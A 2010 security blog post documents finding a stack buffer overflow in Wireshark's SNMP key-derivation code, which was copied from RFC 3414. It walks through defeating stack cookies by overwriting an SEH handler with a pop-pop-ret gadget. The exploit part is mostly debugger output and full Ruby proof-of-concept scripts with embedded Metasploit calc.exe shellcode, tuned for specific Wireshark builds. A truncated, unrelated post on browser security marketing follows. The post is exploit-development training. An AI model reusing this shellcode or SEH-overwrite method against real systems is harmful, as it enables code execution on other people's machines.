Friday, November 5, 2010

Exploit-Dev Practice or Why You Shouldn't Copy-Paste

I've recently taken a break from one of my current personal side projects to practice some open-source bug hunting and exploit-dev. The bug I've found and am going to explain in this post is rather useless (it's not remotely exploitable), but it was a good exercise nonetheless. Since you can't remotely pwn somebody else with it without social engineering, I'm not waiting till it gets patched either :^) So, on with the show...

The bug I found is a simple one in wireshark. You can check out the latest code from wireshark with:
svn co http://anonsvn.wireshark.org/wireshark
Also, for most of my examples, I used one of the recent dev wireshark builds because you can get the pdbs for them. You could go to http://www.wireshark.org/download/automated/win32/ and download a more recent version of the exe and pdbs if you want (wireshark doesn't archive all of the dev builds it makes). The vulnerable code is in epan/dissectors/packet-snmp.c in the snmp_usml_password_to_key_sha1 function. Can you spot the problem?
3057 /*
3058    SHA1 Password to Key Algorithm COPIED from RFC 3414 A.2.2
3059  */
3060 
3061 static void
3062 snmp_usm_password_to_key_sha1(const guint8 *password, guint passwordlen,
3063                   const guint8 *engineID, guint engineLength,
3064                   guint8 *key)
3065 {
3066     sha1_context     SH;
3067     guint8     *cp, password_buf[72];
3068     guint32      password_index = 0;
3069     guint32      count = 0, i;
3070 
3071     sha1_starts(&SH);   /* initialize SHA */
3072 
3073     /**********************************************/
3074     /* Use while loop until we've done 1 Megabyte */
3075     /**********************************************/
3076     while (count < 1048576) {
3077         cp = password_buf;
3078         for (i = 0; i < 64; i++) {
3079             /*************************************************/
3080             /* Take the next octet of the password, wrapping */
3081             /* to the beginning of the password as necessary.*/
3082             /*************************************************/
3083             *cp++ = password[password_index++ % passwordlen];
3084         }
3085         sha1_update (&SH, password_buf, 64);
3086         count += 64;
3087     }
3088     sha1_finish(&SH, key);
3089 
3090     /*****************************************************/
3091     /* Now localize the key with the engineID and pass   */
3092     /* through SHA to produce final key                  */
3093     /* May want to ensure that engineLength <= 32,       */
3094     /* otherwise need to use a buffer larger than 72     */
3095     /*****************************************************/
3096     memcpy(password_buf, key, 20);
3097     memcpy(password_buf+20, engineID, engineLength);
3098     memcpy(password_buf+20+engineLength, key, 20);
3099 
3100     sha1_starts(&SH);
3101     sha1_update(&SH, password_buf, 40+engineLength);
3102     sha1_finish(&SH, key);
3103     return;
3104  }
Besides the actual vuln, I was surprised that this function was copied from an RFC, with few modifications. This is what it looks like in RFC 3414 A.2.2:
   void password_to_key_sha(
      u_char *password,    /* IN */
      u_int   passwordlen, /* IN */
      u_char *engineID,    /* IN  - pointer to snmpEngineID  */
      u_int   engineLength,/* IN  - length of snmpEngineID */
      u_char *key)         /* OUT - pointer to caller 20-octet buffer */
   {
      SHA_CTX     SH;
      u_char     *cp, password_buf[72];
      u_long      password_index = 0;
      u_long      count = 0, i;

      SHAInit (&SH);   /* initialize SHA */

      /**********************************************/
      /* Use while loop until we've done 1 Megabyte */
      /**********************************************/
      while (count < 1048576) {
         cp = password_buf;
         for (i = 0; i < 64; i++) {
             /*************************************************/
             /* Take the next octet of the password, wrapping */
             /* to the beginning of the password as necessary.*/
             /*************************************************/
             *cp++ = password[password_index++ % passwordlen];
         }
         SHAUpdate (&SH, password_buf, 64);
         count += 64;
      }
      SHAFinal (key, &SH);          /* tell SHA we're done */

      /*****************************************************/
      /* Now localize the key with the engineID and pass   */
      /* through SHA to produce final key                  */
      /* May want to ensure that engineLength <= 32,       */
      /* otherwise need to use a buffer larger than 72     */
      /*****************************************************/
      memcpy(password_buf, key, 20);
      memcpy(password_buf+20, engineID, engineLength);
      memcpy(password_buf+20+engineLength, key, 20);

      SHAInit(&SH);
      SHAUpdate(&SH, password_buf, 40+engineLength);
      SHAFinal(key, &SH);
      return;
   }
What really surprised me though was that the comments in the code actually warn about the vuln.

Yes, the vuln is on line 3097 where the engineID is copied into the password_buf. If an engineId is sufficiently large, the buffer will be overflowed. But what actually uses this function? (Like I mentioned earlier, it's not remotely exploitable, so don't get your hopes up :^) Calls to this function end up having call stacks like this:
0:000> k
ChildEBP RetAddr  
0012fb88 008bee28 libwireshark!snmp_usm_password_to_key_sha1
0012fba8 008c07af libwireshark!set_ue_keys+0x58
0012fbc0 008c060a libwireshark!ue_se_dup+0x10f
0012fbdc 006e017a libwireshark!renew_ue_cache+0x5a
0012fbe8 006d19a3 libwireshark!uat_load+0x18a
0012fc04 0069faad libwireshark!uat_load_all+0x53
0012fc44 0069ff59 libwireshark!init_prefs+0x6d
0012fc58 00420673 libwireshark!read_prefs+0x19
0012fcb4 0041e5c8 wireshark!read_configuration_files+0x23
0012ff18 00420a81 wireshark!main+0x6b8
0012ff30 00521bae wireshark!WinMain+0x61
0012ffc0 7c817067 wireshark!__tmainCRTStartup+0x140
0012fff0 00000000 kernel32!BaseProcessStart+0x23
This function is responsible for creating a key based on a sha1 hash of a password that is configured by the user in the wireshark preferences and is called when wireshark is opened, regardless if it is opening a pcap or capturing network traffic. The key is then supposed to be used to help decode SNMP traffic. You can configure preferences through the wireshark UI by going to
Edit->Preferences->Protocols->SNMP->Users Table (Edit...)
and adding a new user/password, or you can directly edit the preferences file at
WINDOWS: %APPDATA%\Wireshark\snmp_users
   *NIX: ~/.wireshark/snmp_users
Note: this only works with sha1 hashes. So, you know the vuln, now a quick run-through on how to exploit it. First off, let's see what the classic "A" * a-whole-bunch looks like. I used this to generate the snmp_users file:
File.open("#{ENV['APPDATA']}\\Wireshark\\snmp_users","w") do |file|
 file.write("A" * 200 + ',"username","SHA1","password","DES","password"' + "\n")
end
After setting windbg to be the postmortem debugger (use `windbg -I` to set it), this is what I see when wireshark opens and dies:
(370.90): Access violation - code c0000005 (!!! second chance !!!)
eax=00000002 ebx=00000000 ecx=00000012 edx=00000002 esi=aaaaaaaa edi=aabda5ee
eip=7855aee6 esp=0012faac ebp=0012fab4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Wireshark\MSVCR90.dll - 
MSVCR90!memcpy+0xc6:
7855aee6 8a06            mov     al,byte ptr [esi]          ds:0023:aaaaaaaa=??
The stack trace is:
0:000> kb
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
0012fab4 008bfd3a aabda5ee aaaaaaaa 00000014 MSVCR90!memcpy+0xc6
0012fb88 aaaaaaaa aaaaaaaa aaaaaaaa aaaaaaaa libwireshark!snmp_usm_password_to_key_sha1+0xea
0012fba8 008c07af 04e71000 04e71054 04e7104c 0xaaaaaaaa
0012fbc0 008c060a 042ed2b8 006df61e 03361b38 libwireshark!ue_se_dup+0x10f
0012fbdc 006e017a 042ed548 0012fc04 006d19a3 libwireshark!renew_ue_cache+0x5a
0012fbe8 006d19a3 0400c510 0012fbfc 0400c510 libwireshark!uat_load+0x18a
0012fc04 0069faad 0133439c 013343a4 013343b0 libwireshark!uat_load_all+0x53
0012fc44 0069ff59 0015233b 00000002 00564944 libwireshark!init_prefs+0x6d
0012fc58 00420673 0012fca4 0012fca8 0012fc80 libwireshark!read_prefs+0x19
0012fcb4 0041e5c8 0012fd0c 0012fd64 00000050 wireshark!read_configuration_files+0x23
0012ff18 00420a81 00000001 02c63fc8 00000008 wireshark!main+0x6b8
0012ff30 00521bae 00400000 00000000 0015233b wireshark!WinMain+0x61
0012ffc0 7c817067 0142d8b0 00000018 7ffd4000 wireshark!__tmainCRTStartup+0x140
0012fff0 00000000 00521d8d 00000000 78746341 kernel32!RegisterWaitForInputIdle+0x49
As you can see in red, we've overwritten our return address, as well as some of the current and previous function's arguments with our engineID data. The reason we didn't see an exception like this
(304.7a8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0165ef54 ebx=00000000 ecx=008bfc50 edx=04e71000 esi=00151f0a edi=005fe5cc
eip=aaaaaaaa esp=0012fb8c ebp=0012fba8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010202
aaaaaaaa ??              ???
is that wireshark was compiled with the /GS flag, meaning that there are stack cookies, as you can see below in red:
libwireshark!snmp_usm_password_to_key_sha1:
008bfc50 55              push    ebp
008bfc51 8bec            mov     ebp,esp
008bfc53 81ecc0000000    sub     esp,0C0h
008bfc59 a118802102      mov     eax,dword ptr [libwireshark!__security_cookie (02218018)]
008bfc5e 33c5            xor     eax,ebp
008bfc60 8945f0          mov     dword ptr [ebp-10h],eax
008bfc63 c745a400000000  mov     dword ptr [ebp-5Ch],0
008bfc6a c745fc00000000  mov     dword ptr [ebp-4],0
008bfc71 8d8540ffffff    lea     eax,[ebp-0C0h]
008bfc77 50              push    eax
008bfc78 e88310e3ff      call    libwireshark!sha1_starts (006f0d00)
...
008bfd63 83c40c          add     esp,0Ch
008bfd66 8b4d18          mov     ecx,dword ptr [ebp+18h]
008bfd69 51              push    ecx
008bfd6a 8d9540ffffff    lea     edx,[ebp-0C0h]
008bfd70 52              push    edx
008bfd71 e85a2ee3ff      call    libwireshark!sha1_finish (006f2bd0)
008bfd76 83c408          add     esp,8
008bfd79 8b4df0          mov     ecx,dword ptr [ebp-10h]
008bfd7c 33cd            xor     ecx,ebp
008bfd7e e85d817b00      call    libwireshark!__security_check_cookie (01077ee0)
008bfd83 8be5            mov     esp,ebp
008bfd85 5d              pop     ebp
008bfd86 c3              ret
The method I used to get around this is the classic overwrite-an-SEH-handler-with-an-address-to-a-pop-pop-ret. I also needed to trigger an exception before the call to __security_check_cookie so that the exception handlers would be called before the cookie was ever checked. The first thing I needed to figure out was how long the engineID needed to be in order to overwrite the SEH address on the stack. You can view the SEH chain in windbg like this:
0:000> bu libwireshark!snmp_usm_password_to_key_sha1              # set the breakpoint
0:000> g                                                          # continue execution
...
0:000> !exchain                                                   # display the SEH chain
0012ffb0: wireshark!_except_handler4+0 (00522555)
0012ffe0: kernel32!_except_handler3+0 (7c839ac0)
  CRT scope  0, filter: kernel32!BaseProcessStart+29 (7c843882)
                func:   kernel32!BaseProcessStart+3a (7c843898)
Invalid exception stack at ffffffff
!exchain says the address of the next SEH structure is at 0x12ffb0. This means the actual address of the next exception handler is at 0x12ffb4. Knowing the address on the stack that needed to be overwritten (0x12ffb4), all I needed to know before I could calculate the length of the engineID was the start address of the overflowed buffer. This is easy enough to do if you set a breakpoint on the vulnerable memcpy. (when I can, I prefer calculating things rather than using metasploit patterns):
0:000> bp 008bfd10
0:000> g
...
# disassembly
008bfd10 83c40c          add     esp,0Ch
008bfd13 8b4514          mov     eax,dword ptr [ebp+14h]
008bfd16 50              push    eax
008bfd17 8b4d10          mov     ecx,dword ptr [ebp+10h]
008bfd1a 51              push    ecx
008bfd1b 8d55bc          lea     edx,[ebp-44h]
008bfd1e 52              push    edx
008bfd1f e8d8817b00      call    libwireshark!memcpy (01077efc)
In my testing, edx (the dst buffer) pointed to 0x12fb44. Thus, the total length to overwrite up to the exception handler address would be 0x12ffb4-0x12fb44 = 1136. Now, since the data in the engineID is supposed to be a hex value and gets converted from hex into binary data, we'll need twice as much, so we'll need an engineID that is 2272 bytes long to overflow up to (not including) the pointer to the next SEH handler code. New ruby code:
def flip_dword(str)
 [str.hex].pack("V").scan(/./m).map{|b| "%02x" % b[0] }.join
end

engine_id = "90" * 1136
engine_id += flip_dword("beefface")

File.open("#{ENV['APPDATA']}\\Wireshark\\snmp_users","w") do |file|
 file.write(engine_id + ',"username","SHA1","password","DES","password"' + "\n")
end
Before/after memcpy (break at 008bfd10):
========================== BEFORE ============================     |=========================== AFTER ============================
0012ff88 00000000                                                  |0012ff88 90909090 
0012ff8c 00000000                                                  |0012ff8c 90909090 
0012ff90 ffffffff                                                  |0012ff90 90909090 
0012ff94 ffffffff                                                  |0012ff94 90909090 
0012ff98 ffffffff                                                  |0012ff98 90909090 
0012ff9c 0012ffac                                                  |0012ff9c 90909090 
0012ffa0 00151f0a                                                  |0012ffa0 90909090 
0012ffa4 00000000                                                  |0012ffa4 90909090 
0012ffa8 0012ff48                                                  |0012ffa8 90909090 
0012ffac 70b782cc                                                  |0012ffac 90909090 
0012ffb0 0012ffe0                                                  |0012ffb0 90909090 
0012ffb4 00522555 wireshark!_except_handler4                       |0012ffb4 beefface <--- Overwritten exception handler
0012ffb8 5abbc6d5                                                  |0012ffb8 5abbc6d5 
0012ffbc 00000001                                                  |0012ffbc 00000001 
0012ffc0 0012fff0                                                  |0012ffc0 0012fff0 
0012ffc4 7c817067 kernel32!BaseProcessStart+0x23                   |0012ffc4 7c817067 kernel32!BaseProcessStart+0x23
0012ffc8 00cdf6f2 libwireshark!dissect_hclnfsd_lock_call+0x102     |0012ffc8 00cdf6f2 libwireshark!dissect_hclnfsd_lock_call+0x102
0012ffcc 00cdf776 libwireshark!dissect_hclnfsd_lock_reply+0x76     |0012ffcc 00cdf776 libwireshark!dissect_hclnfsd_lock_reply+0x76
0012ffd0 7ffd5000                                                  |0012ffd0 7ffd5000 
0012ffd4 8054b6b8                                                  |0012ffd4 8054b6b8 
0012ffd8 0012ffc8                                                  |0012ffd8 0012ffc8 
0012ffdc 82188a80                                                  |0012ffdc 82188a80
Just to show that we overwrote the correct SEH pointer in memory, you'll see this error in windbg:
(2e0.434): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=beefface edx=7c9032bc esi=00000000 edi=00000000
eip=beefface esp=0012f6dc ebp=0012f6fc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
beefface ??              ???
Now that we've got that working, we've got to make sure we raise an error before the stack cookie is checked. But wait, it just worked, so what error are we raising? The actual error when overflowing mainly with nops is this:
(16c.660): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=909090a4 ebx=00000000 ecx=00000005 edx=00000000 esi=90909090 edi=90a38bd4
eip=7855af58 esp=0012faac ebp=0012fab4 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010293
MSVCR90!UnwindUpVec+0x30:
7855af58 8b448eec        mov     eax,dword ptr [esi+ecx*4-14h] ds:0023:90909090=????????
...
0:000> kb
ChildEBP RetAddr  Args to Child              
0012fab4 008bfd3a 90a38bd4 90909090 00000014 MSVCR90!UnwindUpVec+0x30
0012fb88 90909090 90909090 90909090 90909090 libwireshark!snmp_usm_password_to_key_sha1+0xea
...
# disassembly around 008bfd3a
008bfd17 8b4d10          mov     ecx,dword ptr [ebp+10h]
008bfd1a 51              push    ecx
008bfd1b 8d55bc          lea     edx,[ebp-44h]
008bfd1e 52              push    edx
008bfd1f e8d8817b00      call    libwireshark!memcpy (01077efc)
008bfd24 83c40c          add     esp,0Ch
008bfd27 6a14            push    14h
008bfd29 8b4518          mov     eax,dword ptr [ebp+18h]
008bfd2c 50              push    eax
008bfd2d 8b4d14          mov     ecx,dword ptr [ebp+14h]
008bfd30 8d540dbc        lea     edx,[ebp+ecx-44h]
008bfd34 52              push    edx
008bfd35 e8c2817b00      call    libwireshark!memcpy (01077efc)
008bfd3a 83c40c          add     esp,0Ch
What's happening is that we overwrote the "key" parameter to the snmp_usm_password_to_key_sha1 function with nops (\x90). Thus, when the third memcpy is called, it tries to read data from an invalid address (0x90909090):
3096     memcpy(password_buf, key, 20);
3097     memcpy(password_buf+20, engineID, engineLength);
3098     memcpy(password_buf+20+engineLength, key, 20);
Another possible way to generate an error would be to mess with the the engineLength variable, which also comes after the overflowable buffer on the stack. Anyway you do it, you just have to trigger some type of exception. The next thing to do is find a useful address that we can overwrite the SEH address with. Before an SEH handler is read from the stack and called, it must pass several checks (checks are made in ntdll!RtlDispatchException). I'd suggest reading this tutorial by corelanc0d3r (or you could just study ntdll!RtlDispatchException). I used msfpescan to find an address in libwireshark.dll that had the instructions pop-pop-ret. Why pop-pop-ret? If you look at the stack right after our exception handler is called, you'll see this:
ntdll!ExecuteHandler2:
7c903282 55              push    ebp
7c903283 8bec            mov     ebp,esp
7c903285 ff750c          push    dword ptr [ebp+0Ch]
7c903288 52              push    edx
7c903289 64ff3500000000  push    dword ptr fs:[0]
7c903290 64892500000000  mov     dword ptr fs:[0],esp
7c903297 ff7514          push    dword ptr [ebp+14h]
7c90329a ff7510          push    dword ptr [ebp+10h]
7c90329d ff750c          push    dword ptr [ebp+0Ch]
7c9032a0 ff7508          push    dword ptr [ebp+8]
7c9032a3 8b4d18          mov     ecx,dword ptr [ebp+18h]
7c9032a6 ffd1            call    ecx {beefface}             <-- calling our exception handler
...
# stack after the call (esp in the memory window in windbg)
0012f6dc 7c9032a8 ntdll!ExecuteHandler2+0x26
0012f6e0 0012f7c4 
0012f6e4 0012ffb0 
0012f6e8 0012f7e0 
0012f6ec 0012f798 
0012f6f0 0012ffb0 
0012f6f4 7c9032bc ntdll!ExecuteHandler2+0x3a
0012f6f8 0012ffb0 
0012f6fc 0012f7ac 
0012f700 7c90327a ntdll!ExecuteHandler+0x24
0012f704 0012f7c4
Notice anything familiar about that 0012ffb0 address, third down from the top? That's the address of the SEH structure on the stack, the same one we had overwritten with our nops. Thus, if we point the exception handler to a pop-pop-ret, it will pop the first two dwords off the stack (7c9032a8 and 0012f7c4) and return to the third (0012ffb0), which lands eip in instructions that we control. As I mentioned earlier, I used msfpescan to find the pop-pop-rets for me:
-n4g-[ snmpuser ]-$ msfpescan -p libwireshark.dll 

[libwireshark.dll]
0x10003998 pop esi; pop ebp; ret
0x10008240 pop esi; pop ebp; ret
0x1000a530 pop esi; pop ebp; ret
0x1000b510 pop esi; pop ebp; ret
0x1000b890 pop esi; pop ebp; ret
0x1006cb02 pop esi; pop ebp; ret
0x1006cc09 pop ebx; pop edi; ret
0x1006cc0f pop ebx; pop edi; ret
0x103e8404 pop eax; pop eax; ret
0x104022de pop esi; pop edx; retn 0x83ff
0x104024dd pop edi; pop eax; retn 0x83ff
0x10428a8d pop edi; pop ebp; retn 0x83ff
0x1055b972 pop esi; pop ebp; ret
0x1055bae2 pop esi; pop ebp; ret
0x10696426 pop ebx; pop ebp; ret
0x1070a8ee pop eax; pop ebx; retn 0x8b10
0x10748e94 pop esi; pop ebp; ret
0x10909c11 pop esi; pop ebp; ret
0x109f7e89 pop ecx; pop ecx; ret
0x109f7ed5 pop ecx; pop ebp; retn 0x000c
0x109f8055 pop esi; pop edi; retn 0x0010
0x109f8273 pop esi; pop ebx; retn 0x0010
0x109f856b pop edi; pop esi; ret
0x109f8591 pop edi; pop esi; ret
0x109f8631 pop ebx; pop ebp; ret
Any of the above addresses should work, but if you try and verify them in the disassembler in windbg, you won't see any pop-pop-rets. Why not? The output above was assuming libwireshark.dll started at a offset 0x10000000, which it doesn't. To view information about loaded modules in windbg, you could do something like this:
0:000> lml
start    end        module name
00380000 003f6000   libgcrypt_11   (export symbols) ...
00400000 00677000   wireshark   (private pdb symbols) ...
00680000 0262f000   libwireshark C (private pdb symbols) ...
026e0000 026fe000   lua5_1   C (export symbols) ...
685c0000 686be000   libglib_2_0_0   (export symbols) ...
77c10000 77c68000   msvcrt     (pdb symbols) ...
78520000 785c3000   MSVCR90    (private pdb symbols) ...
7c800000 7c8f6000   kernel32   (pdb symbols) ...
7c900000 7c9af000   ntdll      (pdb symbols) ...
You can see that libwireshark starts at offset 0x00680000, and not the 0x10000000 that msfpescan was assuming. This is what it should look like:
-n4g-[ snmpuser ]-$ msfpescan -p libwireshark.dll -I 0x680000

[libwireshark.dll]
0x00683998 pop esi; pop ebp; ret
0x00688240 pop esi; pop ebp; ret
0x0068a530 pop esi; pop ebp; ret
0x0068b510 pop esi; pop ebp; ret
0x0068b890 pop esi; pop ebp; ret
0x006ecb02 pop esi; pop ebp; ret
0x006ecc09 pop ebx; pop edi; ret
0x006ecc0f pop ebx; pop edi; ret
0x00a68404 pop eax; pop eax; ret
0x00a822de pop esi; pop edx; retn 0x83ff
0x00a824dd pop edi; pop eax; retn 0x83ff
0x00aa8a8d pop edi; pop ebp; retn 0x83ff
0x00bdb972 pop esi; pop ebp; ret
0x00bdbae2 pop esi; pop ebp; ret
0x00d16426 pop ebx; pop ebp; ret
0x00d8a8ee pop eax; pop ebx; retn 0x8b10
0x00dc8e94 pop esi; pop ebp; ret
0x00f89c11 pop esi; pop ebp; ret
0x01077e89 pop ecx; pop ecx; ret
0x01077ed5 pop ecx; pop ebp; retn 0x000c
0x01078055 pop esi; pop edi; retn 0x0010
0x01078273 pop esi; pop ebx; retn 0x0010
0x0107856b pop edi; pop esi; ret
0x01078591 pop edi; pop esi; ret
0x01078631 pop ebx; pop ebp; ret
Any of the above addresses should work, so I used the first one (00683998). Changing our ruby code to use this address gives us
def flip_dword(str)
 [str.hex].pack("V").scan(/./m).map{|b| "%02x" % b[0] }.join
end

engine_id = "90" * 1136
engine_id += flip_dword("00683998")

File.open("#{ENV['APPDATA']}\\Wireshark\\snmp_users","w") do |file|
 file.write(engine_id + ',"username","SHA1","password","DES","password"' + "\n")
end
Running wireshark again shows us landing back into our data after our pop-pop-ret handler was called:
0012ffb0 90              nop
0012ffb1 90              nop
0012ffb2 90              nop
0012ffb3 90              nop
0012ffb4 98              cwde
0012ffb5 396800          cmp     dword ptr [eax],ebp
0012ffb8 ffad5a910100    jmp     fword ptr [ebp+1915Ah]
0012ffbe 0000            add     byte ptr [eax],al
0012ffc0 f0ff12          lock call dword ptr [edx
Notice that we have four bytes of instructions we can use before we have to execute the address of our SEH handler (0012ffb4 and 0012ffb5). Since we don't really want to have to execute those instructions, we can put a short jmp at 0012ffb2 (two bytes) to jump over to 0012ffb8 into instructions we can control again. I tried putting the shellcode after 0012ffb8, but it gets truncated/messed with somewhere along the way, so I ended up putting it back before 0012ffb0 and using the first short jmp to jmp over the SEH handler address, and then a second near jmp (required 5 bytes) to jmp back to the start of my shellcode. I used msfpayload to generate the shellcode for calc.exe:
-n4g-[ snmpuser ]-$ msfpayload windows/exec CMD=calc.exe y
# windows/exec - 200 bytes
# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
buf = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" +
"\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95" +
"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e" +
"\x65\x78\x65\x00"
The ruby poc code now looks like this:
def flip_dword(str)
 [str.hex].pack("V").scan(/./m).map{|b| "%02x" % b[0] }.join
end
def to_hex(str)
 str.scan(/./m).map{|b| "%02x" % b[0]}.join
end
# jmp short
def jmp_eb(len)
 "\xeb" + len.chr
end
# jmp near
def jmp_e9(len)
 "\xe9" + [len].pack("V")
end

# windows/exec - 200 bytes
# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
shellcode = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" +
"\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95" +
"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e" +
"\x65\x78\x65\x00"
shellcode += "\x90\x90" + jmp_eb(4) # jmp past the SEH address

nop_length = 1136 - shellcode.length
engine_id = "90" * nop_length
engine_id += to_hex(shellcode)
engine_id += flip_dword("00683998") # pop-pop-ret in libwireshark.dll
engine_id += to_hex(jmp_e9(-(engine_id.length / 2 - nop_length + 5))) # the jmp_e9 is 5 bytes long

File.open("#{ENV['APPDATA']}\\Wireshark\\snmp_users","w") do |file|
 file.write(engine_id + ',"username","SHA1","password","DES","password"' + "\n")
end
This poc now pops calc, but only on the dev build of wireshark that I used though. To get this to work on wireshark 1.4, I had to change the pop-pop-ret address, as well as the amount to overflow the buffer with in order to overwrite the SEH handler. The code below works fine for me in XP SP3 with the default install of Wireshark 1.4:
def flip_dword(str)
 [str.hex].pack("V").scan(/./m).map{|b| "%02x" % b[0] }.join
end
def to_hex(str)
 str.scan(/./m).map{|b| "%02x" % b[0]}.join
end
# jmp short
def jmp_eb(len)
 "\xeb" + len.chr
end
# jmp near
def jmp_e9(len)
 "\xe9" + [len].pack("V")
end

# windows/exec - 200 bytes
# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
shellcode = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" +
"\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95" +
"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e" +
"\x65\x78\x65\x00"
shellcode += "\x90\x90" + jmp_eb(4) # jmp past the SEH address
# nop_length = 1136 - shellcode.length # wireshark 1.5
nop_length = 1128 - shellcode.length # wireshark 1.4
engine_id = "90" * nop_length
engine_id += to_hex(shellcode)
engine_id += flip_dword("00653998") # pop-pop-ret in libwireshark.dll (1.4)
# engine_id += flip_dword("00683998") # pop-pop-ret in libwireshark.dll (1.5)
engine_id += to_hex(jmp_e9(-(engine_id.length / 2 - nop_length + 5))) # the jmp_e9 is 5 bytes long

File.open("#{ENV['APPDATA']}\\Wireshark\\snmp_users","w") do |file|
 file.write(engine_id + ',"username","SHA1","password","DES","password"' + "\n")
end
This was fun, but too bad you can only pwn yourself though.

Lessons learned:
  1. Don't copy and paste code
  2. If you must copy and paste code, at least read the comments

Thursday, August 12, 2010

Upping the Ante: A Thought Exercise

WARNING: This post contains a trip into the wondrous what-if-land to explore a different means of increasing security for the end-user.

I was thinking the other day about how the landing pages for browsers (and other products) usually tout security as one of its main attributes. Below are a few examples:

Firefox:
What makes Firefox the best?

Keeping you safe while you surf is our top priority, which is why Firefox includes advanced anti-phishing and anti-malware technologies plus features like private browsing and “forget this site” to ensure your privacy.

Plus, our open source security process means we have experts around the globe working around the clock to keep you (and your personal information) safe.

Google Chrome:
Google Chrome includes features to help protect you and your computer from malicious websites as you browse the web. Chrome uses technologies such as Safe Browsing, sandboxing, and auto-updates to help protect you against phishing and malware attacks.

Internet Explorer:
Browser Security

Other browsers leave you more exposed to phishing, malware and other online threats. Or they require you to download and configure third-party add-ons just to get the security Internet Explorer 8 comes with right out of the box

Opera:
Safe and secure

